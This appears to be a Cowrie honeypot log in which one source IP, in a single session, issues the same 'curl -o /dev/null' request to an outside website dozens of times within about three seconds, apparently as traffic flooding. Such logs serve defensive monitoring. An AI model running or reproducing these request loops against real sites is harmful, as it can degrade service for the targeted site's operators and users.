{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:16.262520Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:16.263521Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:16.302193Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:16.303249Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:16.341627Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:16.342866Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:16.379704Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:16.380838Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:16.417759Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:16.418783Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:16.456081Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:16.457234Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:16.496280Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:16.497300Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:16.534458Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:16.535617Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:16.574619Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:16.575695Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:16.618721Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:16.619834Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:16.658534Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:16.659871Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:16.697384Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:16.698504Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:16.735695Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:16.736713Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:16.773681Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:16.775602Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:16.812829Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:16.814167Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:16.853261Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:16.854382Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:16.891179Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:16.892215Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:16.931048Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:16.932062Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:16.971730Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:16.972799Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:17.009813Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:17.010990Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:17.052618Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:17.053612Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:17.090733Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:17.091967Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:17.128836Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:17.129850Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:17.169386Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:17.170515Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:17.210640Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:17.212015Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:17.248829Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:17.249905Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:17.291287Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:17.292287Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:17.329457Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:17.330444Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:17.371742Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:17.372936Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:17.410467Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:17.411572Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:17.457226Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:17.458449Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:17.532254Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:17.533408Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:17.571984Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:17.573309Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:17.613781Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:17.614901Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:17.653597Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:17.654632Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:17.693585Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:17.694943Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:17.732901Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:17.733957Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:17.771096Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:17.771874Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:17.812482Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:17.813579Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:17.854239Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:17.855198Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:17.895960Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:17.897043Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:17.937220Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:17.938380Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:17.976686Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:17.977819Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:18.020637Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:18.022081Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:18.059631Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:18.060751Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:18.101871Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:18.102933Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:18.141625Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:18.143394Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:18.181910Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:18.182961Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:18.220576Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:18.221617Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:18.260993Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:18.262317Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:18.311668Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:18.312876Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:18.353634Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:18.354741Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:18.394280Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:18.395411Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:18.433334Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:18.434402Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:18.482519Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:18.483620Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:18.521337Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:18.522372Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:18.564568Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:18.565608Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:18.605700Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:18.606724Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:18.647749Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:18.648872Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:18.687793Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:18.688886Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:18.727334Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:18.728739Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:18.770616Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:18.771670Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:18.809441Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:18.810505Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:18.853539Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:18.855075Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:18.895163Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
